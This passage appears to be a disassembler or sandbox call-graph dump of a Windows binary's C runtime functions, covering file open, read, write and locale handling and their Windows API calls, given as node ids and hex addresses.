6591->6586 6594 2e44b7 __mtinitlocknum 58 API calls 6591->6594 6591->6596 6619 2e1f9d 6591->6619 6624 2e2007 6591->6624 6595 2e20f6 EnterCriticalSection 6593->6595 6594->6591 6595->6596 6616 2e214a 6596->6616 6599 2e2173 __wopenfile 6598->6599 6600 2e218d 6599->6600 6612 2e2348 6599->6612 6634 2e62b3 6599->6634 6601 2e1cc3 __chsize_nolock 58 API calls 6600->6601 6602 2e2192 6601->6602 6603 2e1e89 __wcsnicmp_l 9 API calls 6602->6603 6606 2e1290 6603->6606 6604 2e23ab 6631 2e625f 6604->6631 6613 2e12b2 6606->6613 6609 2e62b3 __wcsnicmp 60 API calls 6610 2e2360 6609->6610 6611 2e62b3 __wcsnicmp 60 API calls 6610->6611 6610->6612 6611->6612 6612->6600 6612->6604 7073 2e1fcd 6613->7073 6615 2e12b8 6615->6578 6629 2e4599 LeaveCriticalSection 6616->6629 6618 2e2151 6618->6589 6620 2e1fbe EnterCriticalSection 6619->6620 6621 2e1fa8 6619->6621 6620->6591 6622 2e442f __lock 58 API calls 6621->6622 6623 2e1fb1 6622->6623 6623->6591 6625 2e2028 LeaveCriticalSection 6624->6625 6626 2e2015 6624->6626 6625->6591 6630 2e4599 LeaveCriticalSection 6626->6630 6628 2e2025 6628->6591 6629->6618 6630->6628 6642 2e5a43 6631->6642 6633 2e6278 6633->6606 6635 2e6351 6634->6635 6637 2e62c5 6634->6637 6985 2e6369 6635->6985 6638 2e1cc3 __chsize_nolock 58 API calls 6637->6638 6641 2e2341 6637->6641 6639 2e62de 6638->6639 6640 2e1e89 __wcsnicmp_l 9 API calls 6639->6640 6640->6641 6641->6609 6641->6612 6645 2e5a4f _doexit 6642->6645 6643 2e5a65 6644 2e1cc3 __chsize_nolock 58 API calls 6643->6644 6646 2e5a6a 6644->6646 6645->6643 6647 2e5a9b 6645->6647 6648 2e1e89 __wcsnicmp_l 9 API calls 6646->6648 6653 2e5b0c 6647->6653 6652 2e5a74 _doexit 6648->6652 6650 2e5ab7 6727 2e5ae0 6650->6727 6652->6633 6654 2e5b2c 6653->6654 6731 2e8a18 6654->6731 6656 2e5c7f 6657 2e1e99 __invoke_watson 8 API calls 6656->6657 6658 2e625e 6657->6658 6660 2e5a43 __wsopen_helper 103 API calls 6658->6660 6659 2e5b48 6659->6656 6661 2e5b82 6659->6661 6668 2e5ba5 6659->6668 6662 2e6278 6660->6662 6762 2e1c8f 6661->6762 6662->6650 6665 2e1cc3 __chsize_nolock 58 API calls 6666 2e5b94 6665->6666 6667 2e1e89 __wcsnicmp_l 9 API calls 6666->6667 6670 2e5b9e 6667->6670 6669 2e5c63 6668->6669 6676 2e5c41 6668->6676 6671 2e1c8f __chsize_nolock 58 API calls 6669->6671 6670->6650 6672 2e5c68 6671->6672 6673 2e1cc3 __chsize_nolock 58 API calls 6672->6673 6674 2e5c75 6673->6674 6675 2e1e89 __wcsnicmp_l 9 API calls 6674->6675 6675->6656 6738 2e6d16 6676->6738 6678 2e5d0f 6679 2e5d3c 6678->6679 6680 2e5d19 6678->6680 6756 2e59bb 6679->6756 6682 2e1c8f __chsize_nolock 58 API calls 6680->6682 6683 2e5d1e 6682->6683 6685 2e1cc3 __chsize_nolock 58 API calls 6683->6685 6684 2e5ddc GetFileType 6686 2e5e29 6684->6686 6687 2e5de7 GetLastError 6684->6687 6689 2e5d28 6685->6689 6770 2e6fac 6686->6770 6690 2e1ca2 __dosmaperr 58 API calls 6687->6690 6688 2e5daa GetLastError 6765 2e1ca2 6688->6765 6693 2e1cc3 __chsize_nolock 58 API calls 6689->6693 6694 2e5e0e CloseHandle 6690->6694 6693->6670 6696 2e5dcf 6694->6696 6697 2e5e1c 6694->6697 6695 2e59bb ___createFile 3 API calls 6698 2e5d9f 6695->6698 6701 2e1cc3 __chsize_nolock 58 API calls 6696->6701 6700 2e1cc3 __chsize_nolock 58 API calls 6697->6700 6698->6684 6698->6688 6702 2e5e21 6700->6702 6701->6656 6702->6696 6705 2e6002 6705->6656 6706 2e61d5 CloseHandle 6705->6706 6708 2e59bb ___createFile 3 API calls 6706->6708 6709 2e61fc 6708->6709 6711 2e608c 6709->6711 6712 2e6204 GetLastError 6709->6712 6710 2e1c8f __chsize_nolock 58 API calls 6713 2e5ec8 6710->6713 6711->6656 6714 2e1ca2 __dosmaperr 58 API calls 6712->6714 6713->6705 6717 2e2a2a 70 API calls __read_nolock 6713->6717 6718 2e5ed0 6713->6718 6722 2e607f 6713->6722 6725 2e7054 60 API calls __lseeki64_nolock 6713->6725 6834 2e7d99 6713->6834 6715 2e6210 6714->6715 6862 2e6ebf 6715->6862 6717->6713 6718->6713 6788 2e897e 6718->6788 6803 2e86ed 6718->6803 6723 2e897e __close_nolock 61 API calls 6722->6723 6724 2e6086 6723->6724 6726 2e1cc3 __chsize_nolock 58 API calls 6724->6726 6725->6713 6726->6711 6728 2e5b0a 6727->6728 6729 2e5ae6 6727->6729 6728->6652 6984 2e702e LeaveCriticalSection 6729->6984 6732 2e8a37 6731->6732 6733 2e8a22 6731->6733 6732->6659 6734 2e1cc3 __chsize_nolock 58 API calls 6733->6734 6735 2e8a27 6734->6735 6736 2e1e89 __wcsnicmp_l 9 API calls 6735->6736 6737 2e8a32 6736->6737 6737->6659 6739 2e6d22 _doexit 6738->6739 6740 2e44b7 __mtinitlocknum 58 API calls 6739->6740 6741 2e6d33 6740->6741 6742 2e442f __lock 58 API calls 6741->6742 6743 2e6d38 _doexit 6741->6743 6751 2e6d46 6742->6751 6743->6678 6744 2e6e94 6883 2e6eb6 6744->6883 6746 2e6e26 6747 2e4869 __calloc_crt 58 API calls 6746->6747 6752 2e6e2f 6747->6752 6748 2e6dc6 EnterCriticalSection 6750 2e6dd6 LeaveCriticalSection 6748->6750 6748->6751 6749 2e442f __lock 58 API calls 6749->6751 6750->6751 6751->6744 6751->6746 6751->6748 6751->6749 6755 2e40a2 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6751->6755 6871 2e6dee 6751->6871 6752->6744 6874 2e6c88 6752->6874 6755->6751 6757 2e59c6 ___crtIsPackagedApp 6756->6757 6758 2e59ca GetModuleHandleW GetProcAddress 6757->6758 6759 2e5a21 CreateFileW 6757->6759 6761 2e59e7 6758->6761 6760 2e5a3f 6759->6760 6760->6684 6760->6688 6760->6695 6761->6760 6763 2e36f3 __getptd_noexit 58 API calls 6762->6763 6764 2e1c94 6763->6764 6764->6665 6766 2e1c8f __chsize_nolock 58 API calls 6765->6766 6767 2e1cab __dosmaperr 6766->6767 6768 2e1cc3 __chsize_nolock 58 API calls 6767->6768 6769 2e1cbe 6768->6769 6769->6696 6771 2e6fb8 6770->6771 6772 2e7014 6770->6772 6771->6772 6775 2e6fda 6771->6775 6773 2e1cc3 __chsize_nolock 58 API calls 6772->6773 6774 2e7019 6773->6774 6776 2e1c8f __chsize_nolock 58 API calls 6774->6776 6777 2e5e47 6775->6777 6778 2e6fff SetStdHandle 6775->6778 6776->6777 6777->6705 6777->6713 6779 2e7054 6777->6779 6778->6777 6891 2e6f45 6779->6891 6781 2e7064 6782 2e706c 6781->6782 6783 2e707d SetFilePointerEx 6781->6783 6784 2e1cc3 __chsize_nolock 58 API calls 6782->6784 6785 2e5eb1 6783->6785 6786 2e7095 GetLastError 6783->6786 6784->6785 6785->6710 6785->6713 6787 2e1ca2 __dosmaperr 58 API calls 6786->6787 6787->6785 6789 2e6f45 __chsize_nolock 58 API calls 6788->6789 6790 2e898c 6789->6790 6791 2e89e2 6790->6791 6793 2e89c0 6790->6793 6795 2e6f45 __chsize_nolock 58 API calls 6790->6795 6792 2e6ebf __free_osfhnd 59 API calls 6791->6792 6794 2e89ea 6792->6794 6793->6791 6796 2e6f45 __chsize_nolock 58 API calls 6793->6796 6797 2e8a0c 6794->6797 6800 2e1ca2 __dosmaperr 58 API calls 6794->6800 6798 2e89b7 6795->6798 6799 2e89cc CloseHandle 6796->6799 6797->6718 6801 2e6f45 __chsize_nolock 58 API calls 6798->6801 6799->6791 6802 2e89d8 GetLastError 6799->6802 6800->6797 6801->6793 6802->6791 6804 2e7054 __lseeki64_nolock 60 API calls 6803->6804 6805 2e870a 6804->6805 6806 2e876f 6805->6806 6807 2e7054 __lseeki64_nolock 60 API calls 6805->6807 6808 2e1cc3 __chsize_nolock 58 API calls 6806->6808 6809 2e877a 6806->6809 6812 2e8726 6807->6812 6808->6809 6809->6718 6810 2e880e 6813 2e8874 6810->6813 6817 2e7054 __lseeki64_nolock 60 API calls 6810->6817 6811 2e874f GetProcessHeap HeapAlloc 6814 2e876a 6811->6814 6824 2e8783 __setmode_nolock 6811->6824 6812->6806 6812->6810 6812->6811 6813->6806 6815 2e7054 __lseeki64_nolock 60 API calls 6813->6815 6816 2e1cc3 __chsize_nolock 58 API calls 6814->6816 6815->6806 6816->6806 6818 2e8826 6817->6818 6818->6806 6819 2e6f45 __chsize_nolock 58 API calls 6818->6819 6820 2e883a SetEndOfFile 6819->6820 6820->6813 6821 2e885a 6820->6821 6823 2e1cc3 __chsize_nolock 58 API calls 6821->6823 6825 2e885f 6823->6825 6826 2e87d4 6824->6826 6828 2e87e3 __setmode_nolock 6824->6828 6904 2e7e88 6824->6904 6827 2e1c8f __chsize_nolock 58 API calls 6825->6827 6829 2e1c8f __chsize_nolock 58 API calls 6826->6829 6831 2e886a GetLastError 6827->6831 6832 2e87f8 GetProcessHeap HeapFree 6828->6832 6830 2e87d9 6829->6830 6830->6828 6833 2e1cc3 __chsize_nolock 58 API calls 6830->6833 6831->6813 6832->6813 6833->6828 6835 2e7da5 _doexit 6834->6835 6836 2e7dc9 6835->6836 6837 2e7db2 6835->6837 6839 2e7e68 6836->6839 6841 2e7ddd 6836->6841 6838 2e1c8f __chsize_nolock 58 API calls 6837->6838 6840 2e7db7 6838->6840 6842 2e1c8f __chsize_nolock 58 API calls 6839->6842 6843 2e1cc3 __chsize_nolock 58 API calls 6840->6843 6844 2e7dfb 6841->6844 6845 2e7e05 6841->6845 6846 2e7e00 6842->6846 6854 2e7dbe _doexit 6843->6854 6847 2e1c8f __chsize_nolock 58 API calls 6844->6847 6848 2e6c88 ___lock_fhandle 59 API calls 6845->6848 6850 2e1cc3 __chsize_nolock 58 API calls 6846->6850 6847->6846 6849 2e7e0b 6848->6849 6851 2e7e1e 6849->6851 6852 2e7e31 6849->6852 6853 2e7e74 6850->6853 6856 2e7e88 __write_nolock 76 API calls 6851->6856 6855 2e1cc3 __chsize_nolock 58 API calls 6852->6855 6857 2e1e89 __wcsnicmp_l 9 API calls 6853->6857 6854->6713 6858 2e7e36 6855->6858 6859 2e7e2a 6856->6859 6857->6854 6860 2e1c8f __chsize_nolock 58 API calls 6858->6860 6980 2e7e60 6859->6980 6860->6859 6863 2e6f2b 6862->6863 6864 2e6ecb 6862->6864 6865 2e1cc3 __chsize_nolock 58 API calls 6863->6865 6864->6863 6869 2e6ef4 6864->6869 6866 2e6f30 6865->6866 6867 2e1c8f __chsize_nolock 58 API calls 6866->6867 6868 2e6f1c 6867->6868 6868->6711 6869->6868 6870 2e6f16 SetStdHandle 6869->6870 6870->6868 6886 2e4599 LeaveCriticalSection 6871->6886 6873 2e6df5 6873->6751 6875 2e6c94 _doexit 6874->6875 6876 2e6ce3 EnterCriticalSection 6875->6876 6878 2e442f __lock 58 API calls 6875->6878 6877 2e6d09 _doexit 6876->6877 6877->6744 6880 2e6cb9 6878->6880 6879 2e6cd1 6887 2e6d0d 6879->6887 6880->6879 6881 2e40a2 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6880->6881 6881->6879 6890 2e4599 LeaveCriticalSection 6883->6890 6885 2e6ebd 6885->6743 6886->6873 6888 2e4599 _doexit LeaveCriticalSection 6887->6888 6889 2e6d14 6888->6889 6889->6876 6890->6885 6892 2e6f65 6891->6892 6893 2e6f50 6891->6893 6895 2e1c8f __chsize_nolock 58 API calls 6892->6895 6897 2e6f8a 6892->6897 6894 2e1c8f __chsize_nolock 58 API calls 6893->6894 6896 2e6f55 6894->6896 6898 2e6f94 6895->6898 6899 2e1cc3 __chsize_nolock 58 API calls 6896->6899 6897->6781 6900 2e1cc3 __chsize_nolock 58 API calls 6898->6900 6901 2e6f5d 6899->6901 6902 2e6f9c 6900->6902 6901->6781 6903 2e1e89 __wcsnicmp_l 9 API calls 6902->6903 6903->6901 6905 2e7e95 __write_nolock 6904->6905 6906 2e7ed4 6905->6906 6907 2e7ef3 6905->6907 6937 2e7ec9 6905->6937 6909 2e1c8f __chsize_nolock 58 API calls 6906->6909 6910 2e7f4b 6907->6910 6911 2e7f2f 6907->6911 6908 2e5770 ___crt_atoflt_l 6 API calls 6912 2e86e9 6908->6912 6913 2e7ed9 6909->6913 6914 2e7f64 6910->6914 6917 2e7054 __lseeki64_nolock 60 API calls 6910->6917 6916 2e1c8f __chsize_nolock 58 API calls 6911->6916 6912->6824 6915 2e1cc3 __chsize_nolock 58 API calls 6913->6915 6963 2e6c34 6914->6963 6918 2e7ee0 6915->6918 6920 2e7f34 6916->6920 6917->6914 6921 2e1e89 __wcsnicmp_l 9 API calls 6918->6921 6923 2e1cc3 __chsize_nolock 58 API calls 6920->6923 6921->6937 6922 2e7f72 6924 2e82cb 6922->6924 6972 2e36db 6922->6972 6925 2e7f3b 6923->6925 6926 2e865e WriteFile 6924->6926 6927 2e82e9 6924->6927 6928 2e1e89 __wcsnicmp_l 9 API calls 6925->6928 6930 2e82be GetLastError 6926->6930 6939 2e828b 6926->6939 6931 2e840d 6927->6931 6945 2e82ff 6927->6945 6928->6937 6930->6939 6934 2e8418 6931->6934 6935 2e8502 6931->6935 6933 2e8697 6933->6937 6938 2e1cc3 __chsize_nolock 58 API calls 6933->6938 6934->6933 6934->6939 6944 2e847d WriteFile 6934->6944 6935->6933 6935->6939 6949 2e8577 WideCharToMultiByte 6935->6949 6952 2e85c6 WriteFile 6935->6952 6936 2e7fdd 6936->6924 6940 2e7fed GetConsoleCP 6936->6940 6937->6908 6942 2e86c5 6938->6942 6939->6933 6939->6937 6943 2e83eb 6939->6943 6940->6933 6961 2e801c 6940->6961 6941 2e836e WriteFile 6941->6930 6941->6945 6946 2e1c8f __chsize_nolock 58 API calls 6942->6946 6947 2e868e 6943->6947 6948 2e83f6 6943->6948 6944->6930 6944->6934 6945->6933 6945->6939 6945->6941 6946->6937 6951 2e1ca2 __dosmaperr 58 API calls 6947->6951 6950 2e1cc3 __chsize_nolock 58 API calls 6948->6950 6949->6930 6949->6935 6953 2e83fb 6950->6953 6951->6937 6952->6935 6955 2e8619 GetLastError 6952->6955 6956 2e1c8f __chsize_nolock 58 API calls 6953->6956 6955->6935 6956->6937 6957 2e92bb 60 API calls __write_nolock 6957->6961 6958 2e8105 WideCharToMultiByte 6958->6939 6959 2e8140 WriteFile 6958->6959 6959->6930 6959->6961 6960 2e92d3 WriteConsoleW CreateFileW __putwch_nolock 6960->6961 6961->6930 6961->6939 6961->6957 6961->6958 6961->6960 6962 2e819a WriteFile 6961->6962 6977 2e91b5 6961->6977 6962->6930 6962->6961 6964 2e6c3f 6963->6964 6965 2e6c4c 6963->6965 6966 2e1cc3 __chsize_nolock 58 API calls 6964->6966 6968 2e6c58 6965->6968 6969 2e1cc3 __chsize_nolock 58 API calls 6965->6969 6967 2e6c44 6966->6967 6967->6922 6968->6922 6970 2e6c79 6969->6970 6971 2e1e89 __wcsnicmp_l 9 API calls 6970->6971 6971->6967 6973 2e36f3 __getptd_noexit 58 API calls 6972->6973 6974 2e36e1 6973->6974 6975 2e36ee GetConsoleMode 6974->6975 6976 2e17be __lock 58 API calls 6974->6976 6975->6924 6975->6936 6976->6975 6978 2e917b __isleadbyte_l 58 API calls 6977->6978 6979 2e91c2 6978->6979 6979->6961 6983 2e702e LeaveCriticalSection 6980->6983 6982 2e7e66 6982->6854 6983->6982 6984->6728 6986 2e637d 6985->6986 6995 2e6394 6985->6995 6987 2e6384 6986->6987 6989 2e63a5 6986->6989 6988 2e1cc3 __chsize_nolock 58 API calls 6987->6988 6990 2e6389 6988->6990 6996 2e4bfc 6989->6996 6992 2e1e89 __wcsnicmp_l 9 API calls 6990->6992 6992->6995 6993 2e63b0 6994 2e8b0f 60 API calls __towlower_l 6993->6994 6993->6995 6994->6993 6995->6641 6997 2e4c0d 6996->6997 7003 2e4c5a 6996->7003 6998 2e36db _LocaleUpdate::_LocaleUpdate 58 API calls 6997->6998 6999 2e4c13 6998->6999 7000 2e4c3a 6999->7000 7004 2e7356 6999->7004 7000->7003 7019 2e4f1d 7000->7019 7003->6993 7005 2e7362 _doexit 7004->7005 7006 2e36db _LocaleUpdate::_LocaleUpdate 58 API calls 7005->7006 7007 2e736b 7006->7007 7008 2e739a 7007->7008 7010 2e737e 7007->7010 7009 2e442f __lock 58 API calls 7008->7009 7011 2e73a1 7009->7011 7012 2e36db _LocaleUpdate::_LocaleUpdate 58 API calls 7010->7012 7031 2e73d6 7011->7031 7014 2e7383 7012->7014 7017 2e17be __lock 58 API calls 7014->7017 7018 2e7391 _doexit 7014->7018 7017->7018 7018->7000 7020 2e4f29 _doexit 7019->7020 7021 2e36db _LocaleUpdate::_LocaleUpdate 58 API calls 7020->7021 7022 2e4f33 7021->7022 7023 2e442f __lock 58 API calls 7022->7023 7024 2e4f45 7022->7024 7029 2e4f63 7023->7029 7025 2e4f53 _doexit 7024->7025 7028 2e17be __lock 58 API calls 7024->7028 7025->7003 7026 2e4f90 7069 2e4fba 7026->7069 7028->7025 7029->7026 7030 2e4831 _free 58 API calls 7029->7030 7030->7026 7032 2e73b5 7031->7032 7033 2e73e1 ___addlocaleref ___removelocaleref 7031->7033 7035 2e73cd 7032->7035 7033->7032 7038 2e715c 7033->7038 7068 2e4599 LeaveCriticalSection 7035->7068 7037 2e73d4 7037->7014 7039 2e71d5 7038->7039 7041 2e7171 7038->7041 7040 2e7222 7039->7040 7042 2e4831 _free 58 API calls 7039->7042 7043 2e8d75 ___free_lc_time 58 API calls 7040->7043 7047 2e724b 7040->7047 7041->7039 7049 2e4831 _free 58 API calls 7041->7049 7051 2e71a2 7041->7051 7044 2e71f6 7042->7044 7045 2e7240 7043->7045 7046 2e4831 _free 58 API calls 7044->7046 7048 2e4831 _free 58 API calls 7045->7048 7052 2e7209 7046->7052 7050 2e72aa 7047->7050 7066 2e4831 58 API calls _free 7047->7066 7048->7047 7055 2e7197 7049->7055 7056 2e4831 _free 58 API calls 7050->7056 7057 2e4831 _free 58 API calls 7051->7057 7067 2e71c0 7051->7067 7058 2e4831 _free 58 API calls 7052->7058 7053 2e4831 _free 58 API calls 7054 2e71ca 7053->7054 7059 2e4831 _free 58 API calls 7054->7059 7060 2e8c12 ___free_lconv_mon 58 API calls 7055->7060 7061 2e72b0 7056->7061 7062 2e71b5 7057->7062 7063 2e7217 7058->7063 7059->7039 7060->7051 7061->7032 7064 2e8d0e ___free_lconv_num 58 API calls 7062->7064 7065 2e4831 _free 58 API calls 7063->7065 7064->7067 7065->7040 7066->7047 7067->7053 7068->7037 7072 2e4599 LeaveCriticalSection 7069->7072 7071 2e4fc1 7071->7024 7072->7071 7074 2e1fdc 7073->7074 7075 2e1ffb LeaveCriticalSection 7073->7075 7074->7075 7076 2e1fe3 7074->7076 7075->6615 7079 2e4599 LeaveCriticalSection 7076->7079 7078 2e1ff8 7078->6615 7079->7078 7081 2e14a6 _doexit 7080->7081 7082 2e14e9 7081->7082 7084 2e14bc _memset 7081->7084 7092 2e14e1 _doexit 7081->7092 7093 2e1f5e 7082->7093 7085 2e1cc3 __chsize_nolock 58 API calls 7084->7085 7087 2e14d6 7085->7087 7089 2e1e89 __wcsnicmp_l 9 API calls 7087->7089 7089->7092 7092->6563 7094 2e1f6e 7093->7094 7095 2e1f90 EnterCriticalSection 7093->7095 7094->7095 7096 2e1f76 7094->7096 7097 2e14ef 7095->7097 7098 2e442f __lock 58 API calls 7096->7098 7099 2e12ba 7097->7099 7098->7097 7102 2e12d5 _memset 7099->7102 7106 2e12f0 7099->7106 7100 2e12e0 7101 2e1cc3 __chsize_nolock 58 API calls 7100->7101 7103 2e12e5 7101->7103 7102->7100 7102->7106 7110 2e1330 7102->7110 7104 2e1e89 __wcsnicmp_l 9 API calls 7103->7104 7104->7106 7113 2e1523 7106->7113 7107 2e1441 _memset 7111 2e1cc3 __chsize_nolock 58 API calls 7107->7111 7110->7106 7110->7107 7116 2e2873 7110->7116 7123 2e2a2a 7110->7123 7191 2e2752 7110->7191 7211 2e2897 7110->7211 7111->7103 7114 2e1fcd __wfsopen 2 API calls 7113->7114 7115 2e1529 7114->7115 7115->7092 7117 2e287d 7116->7117 7118 2e2892 7116->7118 7119 2e1cc3 __chsize_nolock 58 API calls 7117->7119 7118->7110 7120 2e2882 7119->7120 7121 2e1e89 __wcsnicmp_l 9 API calls 7120->7121 7122 2e288d 7121->7122 7122->7110 7124 2e2a4b 7123->7124 7125 2e2a62 7123->7125 7127 2e1c8f __chsize_nolock 58 API calls 7124->7127 7126 2e319a 7125->7126 7131 2e2a9c 7125->7131 7129 2e1c8f __chsize_nolock 58 API calls 7126->7129 7128 2e2a50 7127->7128 7130 2e1cc3 __chsize_nolock 58 API calls 7128->7130 7132 2e319f 7129->7132 7171 2e2a57 7130->7171 7133 2e2aa4 7131->7133 7138 2e2abb 7131->7138 7134 2e1cc3 __chsize_nolock 58 API calls 7132->7134 7135 2e1c8f __chsize_nolock 58 API calls 7133->7135 7136 2e2ab0 7134->7136 7137 2e2aa9 7135->7137 7140 2e1e89 __wcsnicmp_l 9 API calls 7136->7140 7143 2e1cc3 __chsize_nolock 58 API calls 7137->7143 7139 2e2ad0 7138->7139 7142 2e2aea 7138->7142 7144 2e2b08 7138->7144 7138->7171 7141 2e1c8f __chsize_nolock 58 API calls 7139->7141 7140->7171 7141->7137 7142->7139 7147 2e2af5 7142->7147 7143->7136 7145 2e48b1 __malloc_crt 58 API calls 7144->7145 7148 2e2b18 7145->7148 7146 2e6c34 __read_nolock 58 API calls 7149 2e2c09 7146->7149 7147->7146 7150 2e2b3b 7148->7150 7151 2e2b20 7148->7151 7152 2e2c82 ReadFile 7149->7152 7158 2e2c1f GetConsoleMode 7149->7158 7153 2e7054 __lseeki64_nolock 60 API calls 7150->7153 7154 2e1cc3 __chsize_nolock 58 API calls 7151->7154 7155 2e2ca4 7152->7155 7156 2e3162 GetLastError 7152->7156 7153->7147 7157 2e2b25 7154->7157 7155->7156 7164 2e2c74 7155->7164 7159 2e316f 7156->7159 7160 2e2c62 7156->7160 7161 2e1c8f __chsize_nolock 58 API calls 7157->7161 7162 2e2c7f 7158->7162 7163 2e2c33 7158->7163 7165 2e1cc3 __chsize_nolock 58 API calls 7159->7165 7169 2e1ca2 __dosmaperr 58 API calls 7160->7169 7173 2e2c68 7160->7173 7161->7171 7162->7152 7163->7162 7166 2e2c39 ReadConsoleW 7163->7166 7164->7173 7175 2e2cd9 7164->7175 7178 2e2f46 7164->7178 7167 2e3174 7165->7167 7166->7164 7168 2e2c5c GetLastError 7166->7168 7170 2e1c8f __chsize_nolock 58 API calls 7167->7170 7168->7160 7169->7173 7170->7173 7171->7110 7172 2e4831 _free 58 API calls 7172->7171 7173->7171 7173->7172 7176 2e2d45 ReadFile 7175->7176 7184 2e2dc6 7175->7184 7179 2e2d66 GetLastError 7176->7179 7189 2e2d70 7176->7189 7177 2e304c ReadFile 7183 2e306f GetLastError 7177->7183 7190 2e307d 7177->7190 7178->7173 7178->7177 7179->7189 7180 2e2e83 7185 2e2e33 MultiByteToWideChar 7180->7185 7186 2e7054 __lseeki64_nolock 60 API calls 7180->7186 7181 2e2e73 7182 2e1cc3 __chsize_nolock 58 API calls 7181->7182 7182->7173 7183->7190 7184->7173 7184->7180 7184->7181 7184->7185 7185->7168 7185->7173 7186->7185 7187 2e7054 __lseeki64_nolock 60 API calls 7187->7189 7188 2e7054 __lseeki64_nolock 60 API calls 7188->7190 7189->7175 7189->7187 7190->7178 7190->7188 7192 2e275d 7191->7192 7196 2e2772 7191->7196 7193 2e1cc3 __chsize_nolock 58 API calls 7192->7193 7194 2e2762 7193->7194 7195 2e1e89 __wcsnicmp_l 9 API calls 7194->7195 7203 2e276d 7195->7203 7197 2e27a7 7196->7197 7196->7203 7258 2e65a7 7196->7258 7199 2e2873 __fclose_nolock 58 API calls 7197->7199 7200 2e27bb 7199->7200 7225 2e2916 7200->7225 7202 2e27c2 7202->7203 7204 2e2873 __fclose_nolock 58 API calls 7202->7204 7203->7110 7205 2e27e5 7204->7205 7205->7203 7206 2e2873 __fclose_nolock 58 API calls 7205->7206 7207 2e27f1 7206->7207 7207->7203 7208 2e2873 __fclose_nolock 58 API calls 7207->7208 7209 2e27fe 7208->7209 7210 2e2873 __fclose_nolock 58 API calls 7209->7210 7210->7203 7212 2e28a6 7211->7212 7221 2e28a2 _memmove 7211->7221 7213 2e28ad 7212->7213 7214 2e28c0 _memset 7212->7214 7215 2e1cc3 __chsize_nolock 58 API calls 7213->7215 7218 2e28ee 7214->7218 7219 2e28f7 7214->7219 7214->7221 7216 2e28b2 7215->7216 7217 2e1e89 __wcsnicmp_l 9 API calls 7216->7217 7217->7221 7220 2e1cc3 __chsize_nolock 58 API calls 7218->7220 7219->7221 7223 2e1cc3 __chsize_nolock 58 API calls 7219->7223 7222 2e28f3 7220->7222 7221->7110 7224 2e1e89 __wcsnicmp_l 9 API calls 7222->7224 7223->7222 7224->7221 7226 2e2922 _doexit 7225->7226 7227 2e292f 7226->7227 7228 2e2946 7226->7228 7229 2e1c8f __chsize_nolock 58 API calls 7227->7229 7230 2e2a0a 7228->7230 7233 2e295a 7228->7233 7232 2e2934 7229->7232 7231 2e1c8f __chsize_nolock 58 API calls 7230->7231 7234 2e297d 7231->7234 7235 2e1cc3 __chsize_nolock 58 API calls 7232->7235 7236 2e2978 7233->7236 7237 2e2985 7233->7237 7242 2e1cc3 __chsize_nolock 58 API calls 7234->7242 7250 2e293b _doexit 7235->7250 7238 2e1c8f __chsize_nolock 58 API calls 7236->7238 7239 2e29a7 7237->7239 7240 2e2992 7237->7240 7238->7234 7241 2e6c88 ___lock_fhandle 59 API calls 7239->7241 7243 2e1c8f __chsize_nolock 58 API calls 7240->7243 7244 2e29ad 7241->7244 7245 2e299f 7242->7245 7246 2e2997 7243->7246 7248 2e29d3 7244->7248 7249 2e29c0 7244->7249 7252 2e1e89 __wcsnicmp_l 9 API calls 7245->7252 7247 2e1cc3 __chsize_nolock 58 API calls 7246->7247 7247->7245 7253 2e1cc3 __chsize_nolock 58 API calls 7248->7253 7251 2e2a2a __read_nolock 70 API calls 7249->7251 7250->7202 7254 2e29cc 7251->7254 7252->7250 7255 2e29d8 7253->7255 7261 2e2a02 7254->7261 7256 2e1c8f __chsize_nolock 58 API calls 7255->7256 7256->7254 7259 2e48b1 __malloc_crt 58 API calls 7258->7259 7260 2e65bc 7259->7260 7260->7197 7264 2e702e LeaveCriticalSection 7261->7264 7263 2e2a08 7263->7250 7264->7263 7268 2e1932 7265->7268 7267 2e17d9 7269 2e193e _doexit 7268->7269 7270 2e442f __lock 51 API calls 7269->7270 7271 2e1945 7270->7271 7272 2e1973 DecodePointer 7271->7272 7277 2e19fe _doexit 7271->7277 7274 2e198a DecodePointer 7272->7274 7272->7277 7281 2e199a 7274->7281 7275 2e1a5b _doexit 7275->7267 7288 2e1a4c 7277->7288 7279 2e19a7 EncodePointer 7279->7281 7280 2e1a43 7282 2e1a4c 7280->7282 7283 2e17a8 _doexit 3 API calls 7280->7283 7281->7277 7281->7279 7285 2e19b7 DecodePointer EncodePointer 7281->7285 7284 2e1a59 7282->7284 7293 2e4599 LeaveCriticalSection 7282->7293 7283->7282 7284->7267 7287 2e19c9 DecodePointer DecodePointer 7285->7287 7287->7281 7289 2e1a2c 7288->7289 7290 2e1a52 7288->7290 7289->7275 7292 2e4599 LeaveCriticalSection 7289->7292 7294 2e4599 LeaveCriticalSection 7290->7294 7292->7280 7293->7284 7294->7289 7862 2e2460 7863 2e248a 7862->7863 7864 2e2497 7862->7864 7865 2e5770 ___crt_atoflt_l 6 API calls 7863->7865 7866 2e5770 ___crt_atoflt_l 6 API calls 7864->7866 7865->7864 7872 2e24a7 __except_handler4 7866->7872 7867 2e25bf 7868 2e2574 __except_handler4 7868->7867 7869 2e25af 7868->7869 7870 2e5770 ___crt_atoflt_l 6 API calls 7868->7870 7871 2e5770 ___crt_atoflt_l 6 API calls 7869->7871 7870->7869 7871->7867 7872->7867 7872->7868 7874 2e24fe __IsNonwritableInCurrentImage 7872->7874 7880 2e2722 RtlUnwind 7874->7880 7875 2e25d6 7877 2e5770 ___crt_atoflt_l 6 API calls 7875->7877 7876 2e253c __except_handler4 7876->7875 7879 2e5770 ___crt_atoflt_l 6 API calls 7876->7879 7878 2e25e6 __except_handler4 7877->7878 7879->7875 7880->7876 7908 2e8bc0 7909 2e8bcc _doexit 7908->7909 7910 2e8c03 _doexit 7909->7910 7911 2e442f __lock 58 API calls 7909->7911 7912 2e8be0 7911->7912 7913 2e73d6 __updatetlocinfoEx_nolock 58 API calls 7912->7913 7914 2e8bf0 7913->7914 7916 2e8c09 7914->7916 7919 2e4599 LeaveCriticalSection 7916->7919 7918 2e8c10 7918->7910 7919->7918 7920 2e4bdf 7923 2e4fc3 7920->7923 7922 2e4bee 7924 2e4fcf _doexit 7923->7924 7925 2e36db _LocaleUpdate::_LocaleUpdate 58 API calls 7924->7925 7926 2e4fd7 7925->7926 7927 2e4f1d _LocaleUpdate::_LocaleUpdate 58 API calls 7926->7927 7928 2e4fe1 7927->7928 7948 2e4cbe 7928->7948 7931 2e48b1 __malloc_crt 58 API calls 7932 2e5003 7931->7932 7933 2e5130 _doexit 7932->7933 7955 2e516b 7932->7955 7933->7922 7936 